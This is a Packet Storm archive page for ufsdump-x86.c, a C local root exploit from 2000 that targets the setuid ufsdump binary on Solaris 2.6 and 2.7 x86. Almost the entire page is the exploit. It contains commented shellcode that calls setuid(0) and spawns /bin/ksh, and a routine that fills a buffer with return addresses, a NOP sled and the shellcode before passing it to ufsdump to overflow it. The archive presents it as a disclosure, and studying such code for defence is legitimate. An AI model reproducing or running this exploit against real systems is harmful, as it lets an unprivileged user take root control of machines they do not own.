what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ufsdump-x86.c

ufsdump-x86.c
Posted Sep 7, 2000
Site lsd-pl.net

/usr/lib/fs/ufs/ufsdump local root exploit for solaris 2.6 2.7 x86.

tags | exploit, x86, local, root
systems | solaris
SHA-256 | dd99197d8c434871bd2bcdae9e8b48725c52baea524e626dcab75a9e9bb8c9f8

ufsdump-x86.c

Change Mirror Download
/*## copyright LAST STAGE OF DELIRIUM apr 1998 poland        *://lsd-pl.net/ #*/
/*## /usr/lib/fs/ufs/ufsdump #*/

#define NOPNUM 3000
#define ADRNUM 2000
#define TMPNUM 2000
#define ALLIGN 2

char shellcode[]=
"\x33\xc0" /* xorl %eax,%eax */
"\xeb\x08" /* jmp <shellcode+12> */
"\x5f" /* popl %edi */
"\x47" /* incl %edi */
"\xab" /* stosl %eax,%es:(%edi) */
"\x88\x47\x01" /* movb %al,0x1(%edi) */
"\xeb\x0d" /* jmp <shellcode+25> */
"\xe8\xf3\xff\xff\xff" /* call <shellcode+4> */
"\x9a\xff\xff\xff\xff\x07\xff" /* lcall */
"\xc3" /* ret */
"\x33\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17,%al */
"\xe8\xee\xff\xff\xff" /* call <shellcode+17> */
"\xeb\x16" /* jmp <shellcode+59> */
"\x33\xd2" /* xorl %edx,%edx */
"\x58" /* popl %eax */
"\x8d\x78\x14" /* leal 0x14(%eax),edi */
"\x52" /* pushl %edx */
"\x57" /* pushl %edi */
"\x50" /* pushl %eax */
"\xab" /* stosl %eax,%es:(%edi) */
"\x92" /* xchgl %eax,%edx */
"\xab" /* stosl %eax,%es:(%edi) */
"\x88\x42\x08" /* movb %al,0x7(%edx) */
"\xb0\x3b" /* movb $0x3b,%al */
"\xe8\xd6\xff\xff\xff" /* call <shellcode+17> */
"\xe8\xe5\xff\xff\xff" /* call <shellcode+37> */
"/bin/ksh"
;

char jump[]=
"\x8b\xc4" /* movl %esp,%eax */
"\xc3" /* ret */
;

main(int argc,char **argv){
char buffer[10000],adr[4],tmp[4],*b;
int i;

printf("copyright LAST STAGE OF DELIRIUM apr 1998 poland //lsd-pl.net/\n");
printf("/usr/lib/fs/ufs/ufsdump for solaris 2.6 2.7 x86\n\n");

*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+3236+2000;
*((unsigned long*)tmp)=(*(unsigned long(*)())jump)()+3236;

b=buffer;
for(i=0;i<3;i++) *b++=0xff;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
for(i=0;i<NOPNUM;i++) *b++=0x90;
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
for(i=0;i<TMPNUM;i++) *b++=tmp[i%4];
*b=0;

execl("/usr/lib/fs/ufs/ufsdump","lsd","666",buffer,0);
}
/* www.hack.co.za [9 August 2000]*/
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close